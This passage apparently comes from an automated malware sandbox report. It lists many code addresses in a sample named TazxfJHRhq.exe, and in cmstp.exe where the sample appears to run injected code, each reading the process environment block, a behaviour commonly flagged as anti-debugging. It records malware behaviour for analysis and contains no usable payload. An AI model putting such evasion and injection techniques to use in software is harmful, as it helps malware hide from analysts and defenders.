          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
